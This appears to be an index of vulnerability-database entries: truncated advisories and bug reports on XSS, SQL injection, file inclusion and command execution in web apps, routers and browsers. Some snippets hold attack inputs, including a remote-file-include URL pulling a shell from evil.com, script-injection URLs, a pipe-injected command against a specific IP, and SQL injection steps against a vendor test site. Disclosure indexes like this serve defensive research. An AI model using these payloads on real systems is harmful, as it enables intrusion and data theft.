MetaCart E-Shop ProductsByCategory.ASP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13639/info MetaCart e-Shop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrar...
Weaver E-office OA Management System: SQL Injection Allows Password-less Login as Any Real Username
Brief description: The Weaver E-office OA management system allows password-less login as any real username via SQL injection. Details: Taking Weaver's official test site as an example, the login page is http://eoffice8.weaver.cn:8028/login.php and the injectable URL is http://eoffice8.weaver.cn:8028/building/urlurl.php. Accessing it directly shows "access denied"; using HackBar, set url in the POST body to general/index.php and smsid to the injected SQL, with the content 1 union select...
FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
No description provided by source. NeXtMaN mc.nadz at gmail.com Here are 3 RFI vulnerabilities in Flashchat I've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt?...
MikroTik RouterOS SMB Buffer Overflow(CVE-2018-7445)
Advisory Information Title: MikroTik RouterOS SMB Buffer Overflow Advisory ID: CORE-2018-0003 Advisory URL: http://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow Date published: 2018-03-15 Date of last update: 2018-03-15 Vendors contacted: MikroTik Release mode:...
Redis DDoS Vulnerability Caused by MurmurHash2 Algorithm Collisions
Summary information: 1. In a 2012 article, Martin Bosslet noted that a structural weakness in the MurmurHash2 algorithm allows collisions to be generated reliably; this hash function and its variants are used by open-source components such as CRuby, JRuby, Rubinius and Redis. 2. This article is...
Tongda OA SQL Injection Risk
Brief description: Tongda OA is at risk of SQL injection. Details: A complaint first: last time I submitted a stored XSS issue in the latest Tongda version, and the vendor essentially dismissed it on the grounds that "users log in under their real names". I would ask: can user accounts not be stolen? Is whoever logs in necessarily the account owner? The versions affected this time include the trial versions of every release downloadable from the official website. 1. Submit a question through the OA's "Zhidao" (Q&A) module and add a single quote in the question's "tags"; it is written to the database unfiltered. 2. When the question is viewed, the system extracts the content of its "tags" and runs a LIKE query to find related content. The system filters POST, GET, COOKIE and similar input very thoroughly, but data retrieved from its own database is not filtered. Proof of vulnerability:...
PHPWind Flash XSS 0day?
Brief description: Found by accident. A search on WooYun shows insight-labs already submitted this one; the vendor replied that it was fixed, but the fix is incomplete. Details: While testing another site I came across this flash file and looked at the code: ExternalInterface.call(this.jQuery, "jPlayerFlashEvent", arg0.type, this.extractStatusData(arg0.data)); Searching for jQuery: this.jQuery = loaderInfo.parameters.jQuery + "('" + loaderInfo.parameters.id + "').jPlayer";...
MinaliC Webserver 1.0 - Directory Traversal Vulnerability
No description provided by source. ------------------------------------------------------------------------ Software................MinaliC Webserver 1.0 Vulnerability...........Directory Traversal Download................http://sourceforge.net/projects/minalic/ Release Date............10/24/2010...
zcms 2.x Stored XSS and CSRF Vulnerabilities in the Back-end Article Submission Form
No description provided by source...
ecshop Latest Version 2.7.3 Back-end Local File Inclusion Vulnerability
Brief description: Local file inclusion in the back-end of the latest ecshop version 2.7.3. Details: admin/integrate.php, line 110: $code = empty($_GET['code']) ? '' : trim($_GET['code']); if (empty($code) || !file_exists(ROOT_PATH . DATA_DIR . '/integrate/' . $code . '_log.php')) sys_msg($_LANG['lost_intall_log'], 1); include(ROOT_PATH . DATA_DIR . '/integrate/' . $code . '_log.php'); 1. $code is not filtered ...
Firefox GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
BUGTRAQ ID: 37360 CVE(CAN) ID: CVE-2009-3987 Firefox is a popular open-source web browser. The exception message generated by Mozilla's GeckoActiveXObject differs depending on whether the ProgID of the requested COM object exists in the system registry; a malicious site can use this difference to enumerate the COM objects installed on the user's system and build a profile to track the user across browsing sessions. Affected: Mozilla Firefox 3.5.x, Mozilla Firefox 3.0.x, Mozilla SeaMonkey 2.0. Vendor patch: Mozilla -------...
Wukong CRM SQL Injection Requiring No Privileges, #2 (ThinkPHP Feature)
Brief description: A class with no access control that also happens to have an injection (part three of the "making trouble for L.N." series). Also, vendor, please rate this higher and don't be so stingy; I wasn't going to dig any further. Details: /App/Lib/Mobile/LogMobile.class.php. This class has no permission check (no _initialize method). Look at the edit function: // edit communication log public function edit() { if ($this->isPost()) { $id = isset($_POST['id']) ? intval($_POST['id']) : 0; $params = json_decode($_POST['params'], true); if (!is_array($params))...
Webfroot Shoutbox 2.32 Expanded.PHP Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php script...
PHP Back-end Captcha Bypass Enabling Brute Force
Brief description: PHP back-end captcha bypass enabling brute force. Details: Latest version. The login request is: username=admin&password=admin88&authcode=adaa&loginsub=&pytoken=e474ef35609b The captcha is not destroyed after use and can be reused indefinitely, allowing brute force against the back-end login. Proof of vulnerability:...
Google Chrome Use-After-Free Remote Code Execution Vulnerability (CVE-2013-2884)
BUGTRAQ ID: 61551 CVE(CAN) ID: CVE-2013-2884 Google Chrome is a simple, efficient web browser developed by Google. Chrome 28.0.1500.95 has a use-after-free vulnerability in its DOM implementation; a remote attacker can exploit it by tracking a document that contains an Attr object, causing denial of service or other attacks. Affected: Google Chrome 28.0.1500.95. Vendor patch: Google ------ The vendor has released an upgrade patch fixing this security issue; please download it from the vendor's home page:...
ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
BUGTRAQ ID: 57556 CVE(CAN) ID: CVE-2012-5689 BIND is a very widely deployed implementation of the DNS protocol. In certain configurations of ISC BIND 9.8.x and 9.9.x, a DNS64 response policy zone lacking an AAAA rewrite rule allows a remote attacker to cause a denial of service (assertion failure and exit of the affected program) via an AAAA record query. Affected: ISC BIND 9.9.x, ISC BIND 9.8.x. Temporary workaround: On 24 January 2013 the vendor released a beta version fixing this vulnerability. If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measure to reduce the threat: ensure that the RPZ contains an AAAA rewrite rule for every A rewrite rule. Vendor patch: IS...
Online Contact Manager 3.0 view.php id Parameter XSS
Affected versions: =3.0 Description: Online Contact Manager 3.0 is a web-based contact management application. It is exposed to risk from improperly validated user input. A remote user can inject SQL commands and can also perform cross-site scripting attacks; a remote user can also inject HTML to plant malicious content. The 'view.php' script does not properly validate user input to the 'id' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, causes arbitrary code to execute in the target user's browser. The code runs in the context of Online Contact Manager, in the security context of the entire site. Consequently,...
TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit
No description provided by source. #!/usr/bin/php -q -d short_open_tag=on <?php print_r(' -------------------------------------------------------------------------------- TikiWiki <= 1.9 Sirius jhot.php remote commands execution exploit by rgod [email protected] site: http://retrogod.altervista.org dork:...
Netgear R6220 Management Back-end Default Credentials
No description provided by source...
Chuangmeng Network Information Management System v2.2.5 Login Bypass Vulnerability
No description provided by source...
VP-ASP 6.00 (shopcurrency.asp) Remote SQL Injection Vulnerability
No description provided by source. VP-ASP 6.00 SQL Injection / Exploit by [email protected] People claimed there is some underground sploit for vp-asp 6.00 and I was sure that if a sploit really exists in the ug I can find the bug and make a small hack for it ^^ well it didn't take me mor...
Critical RCE Vulnerability Found in Over a Million GPON Home Routers
Overview: We conducted a comprehensive assessment on a number of GPON home routers. Many routers today use GPON internet, and we found a way to bypass all authentication on the devices (CVE-2018-10561). With this authentication bypass, we were also able to unveil another command injection...
eTrust Antivirus Agent r8 Local Privilege Elevation Exploit
No description provided by source. /* ---------------------------------------------------------------------- | 48Bits Advisory -=- Privilege Elevation in eTrust Antivirus Agent r8 | ---------------------------------------------------------------------- Affected versions : I have tested with: -...
Eyou Gateway Allows Viewing User Mail Information Without Authenticated Login
Brief description: The vulnerability allows entry to the Eyou gateway without an Eyou login; only the user's mailbox address is needed to log in and view the user's mailbox operations and related information. Details: /gw/user/php/user/userlogin.php?userid=XXX where XXX is the user's mailbox address; anyone who knows the address can enter the user's gateway, and if it is not known it can be brute-forced. Proof of vulnerability: the redirect happens via the address given in the details....
phpLiteAdmin 'phpliteadmin.php' Remote PHP Code Injection Vulnerability
phpLiteAdmin is a web-based SQLite database management tool. phpLiteAdmin 'phpliteadmin.php' does not properly filter user-supplied data when creating a new database, allowing an attacker to inject a malicious file and execute it with web-server privileges. Affected: phpLiteAdmin =1.9.3. Vendor solution: no detailed solution is currently available: http://code.google.com/p/phpliteadmin/...
User Home Pages UHP_CONFIG.PHP Remote File Inclusion Vulnerability
User Home Pages is a PHP-based personal homepage management program. User Home Pages does not properly filter user-supplied URI data; a remote attacker can exploit this to execute arbitrary commands with web-process privileges. The problem is that the 'uhp_config.php' script does not filter the "mosConfig_absolute_path" parameter; supplying a malicious remote server as the include target can lead to execution of arbitrary PHP code with web-process privileges. Affected: User Home Pages, User Home Pages 0.5 http://mamboxchange.com/projects/uhp/...
Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
No description provided by source. #!/bin/sh Exploit for Apache mod_rewrite off-by-one. Vulnerability discovered by Mark Dowd. CVE-2006-3747 by jack jack\x40gulcas\x2Eorg 2006-08-20 Thx to xuso for helping me with the shellcode. I suppose that you've got the RewriteRule kung/. $1 rule; if not you must...
fluxbb PHP Local File Inclusion Vulnerability
Brief description: An obvious local file inclusion. Details: File: install.php // If we've been passed a default language, use it $install_lang = isset($_REQUEST['install_lang']) ? pun_trim($_REQUEST['install_lang']) : 'English'; // If such a language pack doesn't exist, or isn't up-to-date enough to translate this page, default to English if...
easySite Content Management System: FCKeditor Upload of Files of Any Type
Brief description: Someone exploited this long ago, but I have not seen it published online. Details: Proof of vulnerability:...
CUPS IPP Tag Remote Stack Overflow Vulnerability
BUGTRAQ ID: 26268 CVE(CAN) ID: CVE-2007-4351 Common Unix Printing System (CUPS) is a general-purpose Unix printing system and cross-platform printing solution for Unix environments, based on the Internet Printing Protocol and serving most PostScript and raster printers. The ippReadIO function in CUPS's cups/ipp.c has a stack overflow vulnerability when processing IPP (Internet Printing Protocol) tags; a remote attacker could exploit it to take control of the server....
MS15-076 Windows: DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege (CVE-2015-2370)
Windows: DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege Platform: Windows 8.1 Update (not tested on Windows 7, 10) Class: Elevation of Privilege Summary: Local DCOM DCE/RPC connections can be reflected back to a listening TCP socket, allowing access to an NTLM authentication challenge for...
Kaspersky AntiVirus SysInfo ActiveX Control Arbitrary File Filter Bypass Vulnerability
Kaspersky Antivirus is a popular anti-virus program. The Kaspersky Antivirus ActiveX controls use unsafe methods; a remote attacker can exploit this to download or delete arbitrary files on the system. The problem lies in the ActiveX controls in AxKLProd60.dll and AxKLSysInfo.dll: an attacker can build a malicious web page, lure a user into visiting it to trigger the flaw, and download or delete arbitrary system files with system privileges. Affected: Kaspersky Internet Security 6.0, Kaspersky Anti-Virus 6.0. The fix can be obtained through automatic update: http://www.kaspersky.com/technews?id=203038...
SQuery <= 4.5 (gore.php) Remote File Inclusion Vulnerability
No description provided by source. ================================================================= SQuery <= 4.5 lib_path Remote File Inclusion Exploit ================================================================= Worked On : ALL VERSIONS | | Critical Level : Dangerous | | Bug Found In :...
ColdFusion RCE(CVE-2018-4939)
In October 2017 I published an overview and video proof-of-concept of a Java RMI/deserialization vulnerability affecting the Flex Integration service of Adobe ColdFusion. I held off on publishing all of the details and exploit code at the time because I spotted an additional exploit payload that...
CMSEasy v5.5 /celive/live/header.php SQL Injection Vulnerability
No description provided by source...
KLINK SQL Injection Vulnerability
No description provided by source. Andrés Gómez Exploit Title : KLINK Sql Injection Vulnerability Date : 2010-12-31 Author : Andrés Gómez Software Developed by : http://www.contacto.com http://www.contacto.com.com/ Contact : [email protected] Dork : allinurl:.php?txtCodiInfo= An attacker m...
nginx 1.3.9-1.4.0 - DoS PoC
No description provided by source. Exploit Title: nginx v1.3.9-1.4.0 DOS POC CVE-2013-2028 Google Dork: CVE-2013-2028 Date: 16.05.2013 Exploit Author: Mert SARICA - mert . sarica @ gmail . com - http://www.mertsarica.com Vendor Homepage: http://nginx.org/ Software Link:...
DVbbs < 8.3.0 dispbbs.asp Cross-Site Scripting Vulnerability
All DVBBS versions below 8.3.0 have a generic cross-site scripting vulnerability in the page parameter. In Dvbbs versions between 7.1.X and 8.2.X the XSS is in dispbbs.asp: http://www.example.com:80/dispbbs.asp?boardid=1&id=1&page="<script>alert(/liscker/);</script> In Dvbbs 7.1.0 the XSS is in list.asp: http://www.example.com:80/forum1/list.asp?boardid=1&id=1&page=scripta...
Tomcat snoop.jsp Cross-Site Scripting Vulnerability
No description provided by source...
Apache mod_proxy_ftp Module Null Pointer Dereference Denial of Service Vulnerability
BUGTRAQ ID: 36260 CVE ID: CVE-2009-3094 Apache HTTP Server is a popular web server. The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c of Apache's mod_proxy_ftp module has a null pointer dereference; a malicious FTP server being proxied can send a specially crafted reply to an EPSV or PASV command to crash the httpd child process, causing a limited denial of service. Affected: Apache Group Apache 2.2.x. Vendor patch: Apache Group ------------...
Adobe Flash Player Use After Free Remote Code Execution Vulnerability(CVE-2018-4878)
EXECUTIVE SUMMARY On 1 February, Adobe published an advisory concerning Flash vulnerability CVE-2018-4878. This vulnerability is a use after free that allows remote code execution through a malformed Flash object. Additionally, KISA (Korean CERT) published an advisory about a Flash 0-day used ...
Topsec System getMacAddr.php Command Execution
getMacAddr.php: code block: '; ?> Following getMacAddrFromIfName: code block: function getMacAddrFromIfName($ifName) { $mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output'); if ($mac != null && $mac != '') return $mac[0]; else return ''; } http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo...
ASPCMS 2.2.9 /inc/AspCms_Visits.asp SQL Injection Vulnerability
ASPCMS is a very popular domestic CMS site-building system. In version 2.2.9, line 6 of /inc/AspCms_Visits.asp concatenates ContentID directly into the query statement, causing a SQL injection vulnerability. Affected: ASPCMS 2.2.9...
Squirrelmail 1.4.22 Remote Code Execution (CVE-2017-7692)
Squirrelmail version 1.4.22 and probably prior is vulnerable to a remote code execution vulnerability because it fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to execute arbitrary shell commands on the remote server. The problem is in...
PHPEMS SQL Injection Vulnerability
Brief description: A SQL injection in PHPEMS. Details: 8. PHPEMS SQL injection. The injectable code is in the exercise function of /app/exam/phone.php, around line 239: $numbers[$p['questid']] = intval(ceil($this->exam->getQuestionNumberByQuestypeAndKnowsid($p['questid'], $knowids))); Here the second parameter $knowids of getQuestionNumberByQuestypeAndKnowsid is fully controllable. Inside the function: public function...
Boa 0.93.15 Administrator Password Overwrite Authentication Bypass Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25676/info Boa is prone to an authentication-bypass vulnerability because the application fails to ensure that passwords are not overwritten by specially crafted HTTP Requests. An attacker can exploit this issue to gain...
Mafia Moblog 6 Big.PHP Remote File Include Vulnerability
No description provided by source. #!/usr/bin/env python # coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOC(POCBase): vulID = '81940' # ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-16' createDate = '2015-12-24...
Adobe ColdFusion Deserialization Vulnerability (CVE-2017-3066)
Exploiting Adobe ColdFusion before CVE-2017-3066 In a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me...
PHP 5.3.6 - Buffer Overflow PoC (ROP)
No description provided by source. <?php /* Jonathan Salwan - @jonathansalwan http://shell-storm.org 2011-06-04 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow...
TRS WCM 6.5 /wcm/services/trs:templateservicefacade Arbitrary File Creation Vulnerability
No description provided by source...